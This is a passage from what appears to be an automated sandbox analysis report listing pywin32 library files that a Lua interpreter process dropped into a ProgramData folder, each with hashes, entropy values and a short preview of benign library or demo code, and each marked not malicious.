ADSI objects - fix me!"..# See if the object supports IDispatch..if hasattr(ob, "Invoke"):...imp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\adsi.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	5.87641926904022
Encrypted:	false
SSDEEP:	1536:3ZXMECQdnKLfjUAZ1oqEnvkkTE+kE0VBeEEIYDMjG7lsVc:3ZcxoJbqEnv1TE+kEeXvjG7Ic
MD5:	61DF3D8A18EFAC96AF96FBA2491FD60C
SHA1:	976E4B3EE8D97AF57BC5A768F2C4AA8528A1115F
SHA-256:	1663C06C33738F9666FBD1522CCAB3FF2C0DD3C9DAB5BA47D3BEE4C7952F162C
SHA-512:	F5F0A7343C8C673125C27DD488B72185CB3A5F2EEDFB584790AC2D8C50D134FBBD675EAD1F24355F3E74B36774A932E5770847319AF818FA311D6243012A9A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..ptp.#tp.#tp.#}.}#\|p.#O.."vp.#O.."up.#O.."ep.#O.."\|p.#..."pp.#..."vp.#..."pp.#..."}p.#tp.#.p.#..."~p.#..."up.#..."up.#Richtp.#........................PE..d...G]._.........." ..........................A...........................................`..........................................0..H...X0..........D.......................H.......T............................................................................text............................... ..`.rdata..............................@..@.data...."...P.......6..............@....pdata...............N..............@..@.gfids..4............`..............@..@.rsrc...D............b..............@..@.reloc..H............f..............@..B................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\adsicon.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12541
Entropy (8bit):	4.873446208477536
Encrypted:	false
SSDEEP:	192:4RIBxKFGxaYNblJQZkVWbdc8aQVSfr77gbkd:4pjwJQlc8bSj77gQd
MD5:	0C6C8B9C9F2DD8CBB6D54C73B5CBBE70
SHA1:	0C5F8EA140DC4106FB923B9995DF99B22CDB4ED2
SHA-256:	C11312C62B3F5C7C67203C7CBBB62F2B9E4D64B04EC98A5333ACC0EB99FB1380
SHA-512:	494D6C31FD868EAE5615D2CF4EC937F64D844D6069D6E951E693E8150DB1450C0E06D4CBF1EDD05DBBEDB095480F69978EB51A7F69970F9F1ED9A1E92AC732CC
Malicious:	false
Preview:	ADS_ATTR_CLEAR = ( 1 ).ADS_ATTR_UPDATE = ( 2 ).ADS_ATTR_APPEND = ( 3 ).ADS_ATTR_DELETE = ( 4 ).ADS_EXT_MINEXTDISPID = ( 1 ).ADS_EXT_MAXEXTDISPID = ( 16777215 ).ADS_EXT_INITCREDENTIALS = ( 1 ).ADS_EXT_INITIALIZE_COMPLETE = ( 2 )..ADS_SEARCHPREF_ASYNCHRONOUS = 0.ADS_SEARCHPREF_DEREF_ALIASES = 1.ADS_SEARCHPREF_SIZE_LIMIT = 2.ADS_SEARCHPREF_TIME_LIMIT = 3.ADS_SEARCHPREF_ATTRIBTYPES_ONLY = 4.ADS_SEARCHPREF_SEARCH_SCOPE = 5.ADS_SEARCHPREF_TIMEOUT = 6.ADS_SEARCHPREF_PAGESIZE = 7.ADS_SEARCHPREF_PAGED_TIME_LIMIT = 8.ADS_SEARCHPREF_CHASE_REFERRALS = 9.ADS_SEARCHPREF_SORT_ON = 10.ADS_SEARCHPREF_CACHE_RESULTS = 11.ADS_SEARCHPREF_DIRSYNC = 12.ADS_SEARCHPREF_TOMBSTONE = 13..ADS_SCOPE_BASE = 0.ADS_SCOPE_ONELEVEL = 1.ADS_SCOPE_SUBTREE = 2..ADS_SECURE_AUTHENTICATION = 0x1.ADS_USE_ENCRYPTION = 0x2.ADS_USE_SSL = 0x2.ADS_READONLY_SERVER = 0x4.ADS_PROMPT_CREDENTIALS = 0x8.ADS_NO_AUTHENTICAT

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\demos\objectPicker.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1987
Entropy (8bit):	4.871831040274271
Encrypted:	false
SSDEEP:	48:lHUu2cCmGV9+jMiiuKtsujlyFLLVhYwVG1baoiPppZCWxW:NUTT0iHZj8xLXYeG1baogpppxW
MD5:	FDEA4EDA4794A2F23CB67188FCBF99CA
SHA1:	78AE5F129492DB0AAEE7A45D6BD992342E6ACBB7
SHA-256:	1497E07B0C04848033F6EDC254EEB67C9B7F2A9FC2F63765906A6895CC7D9758
SHA-512:	55DC00DD6D5184EFE1ED755158CDB25FAD3DCD8D512E48A3C2A451FED2D5D8F46D2FA16E0C6D6C93301B2962B79A1006011E4F6304FF870460FCF642D25A131E
Malicious:	false
Preview:	# A demo for the IDsObjectPicker interface..import win32clipboard.import pythoncom.from win32com.adsi import adsi.from win32com.adsi.adsicon import *..cf_objectpicker = win32clipboard.RegisterClipboardFormat(CFSTR_DSOP_DS_SELECTION_LIST)..def main(): . hwnd = 0. . # Create an instance of the object picker. . picker = pythoncom.CoCreateInstance(adsi.CLSID_DsObjectPicker,. None,. pythoncom.CLSCTX_INPROC_SERVER,. adsi.IID_IDsObjectPicker).. # Create our scope init info.. siis = adsi.DSOP_SCOPE_INIT_INFOs(1). sii = siis[0]. . # Combine multiple scope types in a single array entry.. . sii.type = DSOP_SCOPE_TYPE_UPLEVEL_JOINED_DOMAIN \| \. DSOP_SCOPE_TYPE_DOWNLEVEL_JOINED_DOMAIN. . # Set uplevel and downlevel filters to include only computer objects.. # Uplevel filters apply to both mixed and native modes.. # Notice that the uplevel and downlevel flags ar

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\demos\scp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19531
Entropy (8bit):	4.704580833578317
Encrypted:	false
SSDEEP:	192:M3xkN3KcPgrBMb4LTuLUpNa/o58mhMVo62okyG+77QtsKogtWmnxIo8BA3GIDYro:A57lu8agyUcOzEZLE3
MD5:	59B564F7EBB960ED662BEDE8A1415B22
SHA1:	751C4311AD627330C716190BD90BA3CEA4650077
SHA-256:	6671F37454D6B59F89CEAA9C95192BAE2DF879E8F70EACD06996A2EE66F2A4C0
SHA-512:	7C4EFACEBD38D3DE482F79A7A1CBA1E83C36ADA32431BC1E12EA5AF954F3891765AAB4516FC279580E5F0D4D0DD909BB8C4EFBE04EF541E4DDD7085719D18D38
Malicious:	false
Preview:	"""A re-implementation of the MS DirectoryService samples related to services...* Adds and removes an ActiveDirectory "Service Connection Point",. including managing the security on the object..* Creates and registers Service Principal Names..* Changes the username for a domain user...Some of these functions are likely to become move to a module - but there.is also a little command-line-interface to try these functions out...For example:..scp.py --account-name=domain\\user --service-class=PythonScpTest \\. --keyword=foo --keyword=bar --binding-string=bind_info \\. ScpCreate SpnCreate SpnRegister..would:.* Attempt to delete a Service Connection Point for the service class. 'PythonScpTest'.* Attempt to create a Service Connection Point for that class, with 2. keywords and a binding string of 'bind_info'.* Create a Service Principal Name for the service and register it..to undo those changes, you could execute:..scp.py --account-name=domain\\user --service-class=PythonScpTe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\demos\search.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4265
Entropy (8bit):	4.590115252026879
Encrypted:	false
SSDEEP:	96:hum+oR4VOObthZxFyodTPDQLnNqZ1Xmx8HsiZIpYS3ua:hHOpnx3TLQrILXmx8MqIKpa
MD5:	49DF6CD71E06ABA5B1C98121885E6916
SHA1:	972A668831DCAA2A08946182C11D69483666CAD1
SHA-256:	48A562213D3022C6753D1A938C460CF6C93ECCB35A4CB7F05699C7DEE65E4E5A
SHA-512:	420FAC40DBF5ABCA0C5111F083D68ABD4BA3ED56BF8AF571968EE93F18EEF0F33AB41087F200F805E7BA3EB8E13CA74932E8B69990C6861B423B5FD86605AB49
Malicious:	false
Preview:	from win32com.adsi import adsi.from win32com.adsi.adsicon import .from win32com.adsi import adsicon.import pythoncom, pywintypes, win32security..options = None # set to optparse options object..ADsTypeNameMap = {}..def getADsTypeName(type_val):. # convert integer type to the 'typename' as known in the headerfiles.. if not ADsTypeNameMap:. for n, v in adsicon.__dict__.items():. if n.startswith("ADSTYPE_"):. ADsTypeNameMap[v] = n. return ADsTypeNameMap.get(type_val, hex(type_val))..def _guid_from_buffer(b):. return pywintypes.IID(b, True)..def _sid_from_buffer(b):. return str(pywintypes.SID(b)).._null_converter = lambda x: x..converters = {. 'objectGUID' : _guid_from_buffer,. 'objectSid' : _sid_from_buffer,. 'instanceType' : getADsTypeName,.}..def log(level, msg, args):. if options.verbose >= level:. print("log:", msg % args)..def getGC():. cont = adsi.ADsOpenObject("GC:", options.user, options.password, 0, adsi.IID_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\demos\test.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7276
Entropy (8bit):	5.1477146154652536
Encrypted:	false
SSDEEP:	192:kqnughCYkjnRmazjnRr0xFmW6vgEsIzsFEEHrsnkca/cF:kHV4MjY6oEsIzsFE4snvHF
MD5:	831F044079A6ECC95C7B106CC2F9AD22
SHA1:	878B427C6797FD1413AE4847232DF75589B7F585
SHA-256:	2DF92A574BF8AAAEDFA55FA6F5D63B1BD9BBA199B16BF2429BCF958AD896F922
SHA-512:	34DE6172259045C19DA29C46EDDD4E3BEDC54DCE3F0BB0CC89A2783286276618FCD474A047EB8607CEA5CF69F0923EF7A28E92A797393776BED7DCD9F8CA2286
Malicious:	false
Preview:	import sys, string.import pythoncom..import win32api.from win32com.adsi import *..verbose_level = 0..server = '' # Must have trailing /.local_name = win32api.GetComputerName()..def DumpRoot():.."Dumps the root DSE"..path = "LDAP://%srootDSE" % server..rootdse = ADsGetObject(path)...for item in rootdse.Get("SupportedLDAPVersion"):...print("%s supports ldap version %s" % (path, item))....attributes = ["CurrentTime", "defaultNamingContext"]..for attr in attributes:...val = rootdse.Get(attr)...print(" %s=%s" % (attr, val))..###############################################.#.# Code taken from article titled:.# Reading attributeSchema and classSchema Objects.def _DumpClass(child):..attrs = "Abstract lDAPDisplayName schemaIDGUID schemaNamingContext attributeSyntax oMSyntax".._DumpTheseAttributes(child, string.split(attrs))...def _DumpAttribute(child):..attrs = "lDAPDisplayName schemaIDGUID adminDescription adminDisplayName rDNAttID defaultHidingValue defaultObjectCategory systemOnly defaultSec

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	192
Entropy (8bit):	4.73288878491099
Encrypted:	false
SSDEEP:	3:SbFVEbW2llQkEr66FuxAAyWX7myhAgMXFPJoFcAtUIVKzLHSKPWlQkEr66NRS66g:SbFubDlQkDAAyWrNhS5WmKVsLH7WlQkQ
MD5:	7D64D75FE448A0373F44C19C8826FA9F
SHA1:	08FEC202B3EB2AF84AC9E0643E2A436DB75635E1
SHA-256:	8B4F8E4916EC7CA0C45DDDEB0CE7A392C31239A65F322E09F6CB992DE4D8570D
SHA-512:	E729826E71DFD6FADEC5F5512843FCBAB77689A5E9A77AB98460532CA3DE13BFACC276D570D782E06CC4CA2F993D946BA3C66FC3EBE03F7FA6B6D30BAAF945BE
Malicious:	false
Preview:	# This is a python package.# __PackageSupportBuildPath__ not needed for distutil based builds,.# but not everyone is there yet..import win32com.win32com.__PackageSupportBuildPath__(__path__)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\authorization.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.231475438260202
Encrypted:	false
SSDEEP:	384:MkbZ78mPqOU5j7rYwEM6DOirmMsUhUpEgkkPEhL1u:MkbRTiyKRXpCGEhL1u
MD5:	B84244C65B746BA896172875546C6CC5
SHA1:	41B348A41AF9E012A4A8CE685A490D1983529AD4
SHA-256:	B21000510121732ADC8D9ED08052904089D28D3B8A9FF305F198B6A2C15421CD
SHA-512:	8F9E943C4992E765B25FED35D156F978A8D624E1B67BBA4EC61A239A5AEC8D9C4B595B61D631CB7734A41A0210E8556EAFAB8DAC0B360E2C9FEBF2CB61750C19
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...ni..ni..ni..g.e.ji..U7..li..U7..oi..U7..ai..U7..fi...7..ji......li......ii..ni..4i...7..li...7..oi...7..oi..Richni..........PE..d....]._.........." .....(...@......\(........D...........................................`.........................................0[..\....[..........d.......D....................H..T...........................0I...............@...............................text....'.......(.................. ..`.rdata...,...@.......,..............@..@.data...p....p.......Z..............@....pdata..D............^..............@..@.gfids..4............d..............@..@.rsrc...d............f..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\demos\EditSecurity.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7800
Entropy (8bit):	5.08348916841776
Encrypted:	false
SSDEEP:	96:UiuLfJV6+l2uU3weqmuuHxCac15umzMQxYB/TLmn6ohS4y/iuPJ4uwGSuuHxl+Mw:2rscYxxc1/0LQlmljpYxEAtw
MD5:	3C47AF8244F86A8FC64BC0566DD97F75
SHA1:	6D166269DD79A738B35D82E76F47BBC281DFA7A9
SHA-256:	62E73FCE1A3A19BFE14B4487CF1C882F7AB4059F240E298B42C2D01AAB8BC8DB
SHA-512:	AC1ECDC60F69F4F245147DDD52D81C352BE15BC8C7440A0BD905336E352C1CD5FF01A67DB176CA310D3402411836853426F6A9F9F926A4275C1F7599D8661EB9
Malicious:	false
Preview:	import os.import win32com.server.policy.import win32security, ntsecuritycon, win32con.import pythoncom, win32api.from win32com.authorization import authorization..from ntsecuritycon import FILE_READ_ATTRIBUTES, FILE_READ_DATA, FILE_READ_EA, SYNCHRONIZE,\. STANDARD_RIGHTS_READ, STANDARD_RIGHTS_WRITE, STANDARD_RIGHTS_EXECUTE, FILE_APPEND_DATA, \. FILE_WRITE_ATTRIBUTES, FILE_WRITE_DATA, FILE_WRITE_EA, WRITE_OWNER, WRITE_DAC, READ_CONTROL, \. SI_ADVANCED, SI_EDIT_AUDITS, SI_EDIT_PROPERTIES, SI_EDIT_ALL, SI_PAGE_TITLE, SI_RESET, \. SI_ACCESS_SPECIFIC, SI_ACCESS_GENERAL, SI_ACCESS_CONTAINER, SI_ACCESS_PROPERTY, \. FILE_ALL_ACCESS, FILE_GENERIC_READ, FILE_GENERIC_WRITE, FILE_GENERIC_EXECUTE, \. OBJECT_INHERIT_ACE, CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, \. SI_PAGE_PERM, SI_PAGE_ADVPERM, SI_PAGE_AUDIT, SI_PAGE_OWNER, PSPCB_SI_INITDIALOG, \. SI_CONTAINER.from win32security import OBJECT_INHERIT_ACE, CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE.from win32com.shell.shellcon im

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\demos\EditServiceSecurity.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7465
Entropy (8bit):	5.157296655938127
Encrypted:	false
SSDEEP:	96:99FoxVJV6+EweSac05Byz4OU/uh4j/iu7Wiix9c9RQCBEJxOMbcXozfHW:9Yxxr6Bc0Wp2laiixX4EJxRf2
MD5:	E09F7A122AE3CA2C185AC7E1681EA5B1
SHA1:	01F09A804691C3FE3E477A0D154F03321EBF7035
SHA-256:	C6C0B3D901EA8EA6D3308B239FCCFCCF8684AF28D8E98B31D6082824376A1537
SHA-512:	51E20861F66CBA0A3AF3091AB7AFCBDA678794FE3548F33E70A86E908826531BB896ED68DE8B648C02C7E724C37C9CD5BB283F59F6C2B1AFF53CBEEAFBFB6098
Malicious:	false
Preview:	""".Implements a permissions editor for services..Service can be specified as plain name for local machine,.or as a remote service of the form \\machinename\service."""..import os.import win32com.server.policy.import win32security, ntsecuritycon, win32con.import pythoncom, win32api, win32service.from win32com.authorization import authorization..SERVICE_GENERIC_EXECUTE=win32service.SERVICE_START\|win32service.SERVICE_STOP\|win32service.SERVICE_PAUSE_CONTINUE\|win32service.SERVICE_USER_DEFINED_CONTROL.SERVICE_GENERIC_READ=win32service.SERVICE_QUERY_CONFIG\|win32service.SERVICE_QUERY_STATUS\|win32service.SERVICE_INTERROGATE\|win32service.SERVICE_ENUMERATE_DEPENDENTS.SERVICE_GENERIC_WRITE=win32service.SERVICE_CHANGE_CONFIG..from ntsecuritycon import STANDARD_RIGHTS_READ, STANDARD_RIGHTS_WRITE, STANDARD_RIGHTS_EXECUTE, \. WRITE_OWNER, WRITE_DAC, READ_CONTROL, \. SI_ADVANCED, SI_EDIT_AUDITS, SI_EDIT_PROPERTIES, SI_EDIT_ALL, SI_PAGE_TITLE, SI_RESET, \. SI_ACCESS_SPECIFIC, SI_ACCESS_GENERAL

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axcontrol\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	135
Entropy (8bit):	4.680015638860431
Encrypted:	false
SSDEEP:	3:SAFMBm3EAAGHQ+HWg7AIvGUVsLHSKPWlQkEr66NRS66gn:SgCmCGHQqAaGUWLH7WlQkAS63n
MD5:	00E2E2F3A54C8FC696EE191CF0C233AC
SHA1:	EAEB5C99325EFACBE8475B8A137C3C71EC91FDAF
SHA-256:	FD359A86764B2024239F4BFBCE53146582721F33AAFD88E7BA2E137DB58ED7AA
SHA-512:	41A42F18B7D6918E5859D3D8689374AC9FEC92FE19BA76BAC412E314D13D8261C9186E2421F32E336B67DCF3CFF3813BD31354CB4812D9248003DD56749736E2
Malicious:	false
Preview:	# See if we have a special directory for the binaries (for developers).import win32com.win32com.__PackageSupportBuildPath__(__path__)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	140800
Entropy (8bit):	5.722901027704837
Encrypted:	false
SSDEEP:	3072:0YXQfdUE3KVCiU3s0r19u0zwFC7CpCQQZAkp4hHBICX:RXQfd9KVCxc5E+Gp4hHB
MD5:	53625DAC36183B332EB1E827DB55361B
SHA1:	4E859C2F726B6FAAD10D783DE64A045FA68C11E2
SHA-256:	C6248B8AAE661D0BAA29297A2BFA7933D333634907C97AC46A59771BE57AA641
SHA-512:	7E32A7AF9763B955293F0A79422273D1C9E643C6151F7789680132A362216320FF5F7CB1685E62F95CF4FD5EC36909CB45087DA546A632F7A971E4342E9311CF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ID..(.(.(.P..(.v+.(.v).(.v/.(.v..(..J,.(./v+.(..A+.(..J+.(.(+..(./v/.(./v.(./v(.(.Rich.(.................PE..d...M]._.........." ................T.........G...........................................`.............................................T...T........p..T....@..................x.......T...........................`................ ...............................text............................... ..`.rdata....... ......................@..@.data...H4..........................@....pdata.......@......................@..@.gfids..4....`......................@..@.rsrc...T....p......................@..@.reloc..x...........................@..B........................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	134
Entropy (8bit):	4.675619922861748
Encrypted:	false
SSDEEP:	3:SAFMBm3EAAGHQ+HWg7AIvGUVsLHSKPWlQkEr66NRS66u:SgCmCGHQqAaGUWLH7WlQkAS6v
MD5:	9C6956D5D42C5345AFCBFDCB35F5AF9D
SHA1:	00DDFA953BAE99AFED7328D70BAD4601A0BE2D66
SHA-256:	3109A400B18D4661F30515F39B4174B8FB1BB37FFC45BFF82300F8B327EA39CE
SHA-512:	15EF53467336231513E296772062B5AA06AC8D4DD36BB8D52E5A17EE5D2E1E6CB142AB14AAC43E643D9EAA5B59F6D400D72D2591DC78F9AABF49C0780A2145F3
Malicious:	false
Preview:	# See if we have a special directory for the binaries (for developers).import win32com.win32com.__PackageSupportBuildPath__(__path__).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\adb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17305
Entropy (8bit):	4.5923632454316445
Encrypted:	false
SSDEEP:	192:eYvD4+wNdp6Tz3G5VI1As62xrXmcXabLvbpduFvqUWrGbp/RWxq5ZZZG+q8VhgWj:eYvMXK73La/Sv0HdaB
MD5:	C54867E362B587C5FF4EBB6FEDA4273D
SHA1:	C69925F400C15DCBA43C497DE42FD313A6BEA2D8
SHA-256:	9AA19BE47CAC8FACE0F7D94C546960FD7F7C3B42CF55D49F157474905697BC7B
SHA-512:	F423CE25BCFDA265F966F7D6796A80D5BAF3F8EC3DC95B46744C96FB91BAF8A46F164EAD3D61E61AA651B1122A4CBEFE91C8910C83789AC51E05933F5F5BDCBE
Malicious:	false
Preview:	"""The glue between the Python debugger interface and the Active Debugger interface.""".from win32com.axdebug.util import trace, _wrap, _wrap_remove.from win32com.server.util import unwrap.import win32com.client.connect.from . import gateways.import sys, bdb, traceback.import axdebug, stackframe.import win32api, pythoncom.import _thread, os..def fnull(*args):. pass..try:. os.environ["DEBUG_AXDEBUG"]. debugging = 1.except KeyError:. debugging = 0..traceenter = fnull # trace enter of functions.tracev = fnull # verbose trace..if debugging:. traceenter = trace # trace enter of functions. tracev = trace # verbose trace..class OutputReflector:. def __init__(self, file, writefunc):. self.writefunc = writefunc. self.file = file. def __getattr__(self,name):. return getattr(self.file, name). def write(self,message):. self.writefunc(message). self.file.write(message)..def _dumpf(frame):. if frame is None:. return "<None>".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\axdebug.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	5.840127558023593
Encrypted:	false
SSDEEP:	6144:YDP+yBBCcxselp6G8Hyof+X3pWkiKzRS56zNKBZhNtTYydlNEwmHOoHg1h0Dc09z:YDP+yBBCcxselp6G8Hyof+X3pWkiKzUe
MD5:	63A832F716477CEFE23BB959E92E0D76
SHA1:	67B267474DAB7237BBD89FDE0536E7055D917013
SHA-256:	6D37AC7FE34E6EE3D30CA83E4FEB22AACF3F663EC6D9F3E982EC73DD573BE052
SHA-512:	9F47E623A71E1F4C78624554867CDCA67262B984BEB51A1D9E70845F2265FF795EBDA66511229EF5DE901D7A8AE96FB99B694DEFE213D872FD06243FC3F337E9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:U{.~4..~4..~4..wL..x4..Ej..\|4..Ej...4..Ej..o4..Ej..v4...V..{4...]..\|4...V..z4...j..y4..~4...4...j..R4...j...4...j...4..Rich~4..........................PE..d...e]._.........." .....8...&.......0........J...........................................`.........................................@...P...............L....p...0..............P...@...T............................................P...............................text....7.......8.................. ..`.rdata..h....P.......<..............@..@.data....~.......:..................@....pdata...0...p...2..................@..@.gfids..4............D..............@..@.rsrc...L............F..............@..@.reloc..P............J..............@..B................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\codecontainer.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8899
Entropy (8bit):	4.54894380005385
Encrypted:	false
SSDEEP:	192:oG1bU1rXdFUI7GWZOuDaO80TiGYFLVHS8KDS:oGhUFz7bZDaO80SR+DS
MD5:	87131B139FAAF2BCE3163F6C67EEA94A
SHA1:	AA1519F649957DFA96D793F77A1092EC50991A6C
SHA-256:	C66256A413C7A10438C61F74084E858C1CD4DDFFD1EE2AB4E1DF0B2B857DF689
SHA-512:	E1104CDF8E7DC75ACF6AFE1023BFBDB3023857BF81B96BD519F1FD51C588FAA91985B349E0646A8AB9DA95A26DD5EA2537B9B367105B7E330A1EF19471584F67
Malicious:	false
Preview:	"""A utility class for a code container...A code container is a class which holds source code for a debugger. It knows how.to color the text, and also how to translate lines into offsets, and back.."""..import sys.from win32com.axdebug import axdebug.import tokenize.from .util import RaiseNotImpl, _wrap..from win32com.server.exception import Exception.import win32api, winerror.from . import contexts.._keywords = {} # set of Python keywords.for name in """. and assert break class continue def del elif else except exec. finally for from global if import in is lambda not. or pass print raise return try while. """.split():. _keywords[name] = 1..class SourceCodeContainer:. def __init__(self, text, fileName = "<Remove Me!>", sourceContext = 0, startLineNumber = 0, site = None, debugDocument = None):. self.sourceContext = sourceContext # The source context added by a smart host.. self.text = text. if text:. self._buildlines().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\contexts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.6111784115109415
Encrypted:	false
SSDEEP:	48:X6TLppcEpqyDM2fztqDIHImZjAOfle2g4j:qTzdM2fztqDIHImSyle2g+
MD5:	3072C5EAD9426B2820F9C7DFFD989278
SHA1:	3B8DC7C9C4AE60D836D4E17B71EAA2AF253103F7
SHA-256:	DB6AB6CE707B979B8EB383D6BFE8B07E3148E0CBC170BF16F0C433BD79A5190E
SHA-512:	F79D2CEDB929652ABDAAC2BA95140BB1E67BFA6B5AA7772D147986315F49A023EDE8E26EC4ABEA0526AD27FC5BA67882C93597A80888E86DF507AFA865FCF2E9
Malicious:	false
Preview:	""" A module for managing the AXDebug I*Contexts..""".import gateways, axdebug.import pythoncom, win32com.server.util..# Utility function for wrapping object created by this module..from .util import _wrap, _wrap_remove, trace.from . import adb..class DebugCodeContext(gateways.DebugCodeContext, gateways.DebugDocumentContext):. # NOTE: We also implement the IDebugDocumentContext interface for Simple Hosts.. # Thus, debugDocument may be NULL when we have smart hosts - but in that case, we. # wont be called upon to provide it.. _public_methods_ = gateways.DebugCodeContext._public_methods_ + \. gateways.DebugDocumentContext._public_methods_. _com_interfaces_ = gateways.DebugCodeContext._com_interfaces_ + \. gateways.DebugDocumentContext._com_interfaces_.. def __init__(self, lineNo, charPos, len, codeContainer, debugSite):. self.debugSite = debugSite. self.offset = charPos. self.length = len. self.brea

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\debugger.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6941
Entropy (8bit):	4.66769045516779
Encrypted:	false
SSDEEP:	192:kZY4T03SwwkDCx7kPIGGhdXC2P1UPHi0IUNk8bSuPhfdCBW0PFjYo:kZtoiMlakfID
MD5:	49A19A10CAFE7214A386E639585BDA6F
SHA1:	2B805DEB4E7D8EFAC3E27F887C8374AF735D14BD
SHA-256:	9FF4190344C8432E68FBA1F601ABD7318C0015D11004D58CD83A73F90F96B7AE
SHA-512:	C7F220CFE5B62D293D2801456CEB6B9E85396A6037EE35293982304B620933B9C44C46A9043C4599BADB707567C97194A4B9D495E21DB41C8090E4A6FB46DEF7
Malicious:	false
Preview:	import sys, traceback, string..from win32com.axscript import axscript.from win32com.axdebug import codecontainer, axdebug, gateways, documents, contexts, adb, expressions.from win32com.axdebug.util import trace, _wrap, _wrap_remove..import pythoncom.import win32api, winerror.import os..currentDebugger = None..class ModuleTreeNode:. """Helper class for building a module tree. """. def __init__(self, module):. modName = module.__name__. self.moduleName = modName. self.module = module. self.realNode = None. self.cont = codecontainer.SourceModuleContainer(module). def __repr__(self):. return "<ModuleTreeNode wrapping %s>" % (self.module). def Attach(self, parentRealNode):. self.realNode.Attach(parentRealNode).. def Close(self):. self.module = None. self.cont = None. self.realNode = None..def BuildModule(module, built_nodes, rootNode, create_node_fn, create_node_args ):. if module:. keep = modu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\documents.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4426
Entropy (8bit):	4.640603337602476
Encrypted:	false
SSDEEP:	96:26TurKcyE/q7J3KSSLDZGh5IVzy6PKkLiGITK9l1Yxh9od:jVE/SJ3XSLDtdPKkLYuchS
MD5:	69881FFB44F333D79182790B21ED552D
SHA1:	2BE2EB88DA0057923376CE70D6027E7B49356188
SHA-256:	B6519D6B23539A626178A663609E9E4805637BDE328758E3B697EAF56036B462
SHA-512:	89F96CFFF2A248ADE9CD800CF897F010547CDC4842B3494783FAC5CCB467AAAD94F31D2C3F92FEEE0094A197E21987E69FDB4CC9B9EA234E865C51992CBA3854
Malicious:	false
Preview:	""" Management of documents for AXDebugging.."""..import axdebug, gateways.import pythoncom.from .util import _wrap, _wrap_remove, RaiseNotImpl, trace.from win32com.server.util import unwrap.from . import codecontainer.from . import contexts.from win32com.server.exception import Exception.import win32api, winerror, os, string, sys..#def trace(*args):.# pass..def GetGoodFileName(fname):. if fname[0] != "<":. return win32api.GetFullPathName(fname). return fname..class DebugDocumentProvider(gateways.DebugDocumentProvider):. def __init__(self, doc):. self.doc = doc.. def GetName(self, dnt):. return self.doc.GetName(dnt).. def GetDocumentClassId(self):. return self.doc.GetDocumentClassId().. def GetDocument(self):. return self.doc..class DebugDocumentText(gateways.DebugDocumentInfo, gateways.DebugDocumentText, gateways.DebugDocument):. _com_interfaces_ = gateways.DebugDocumentInfo._com_interfaces_ + \. gatew

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\dump.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1814
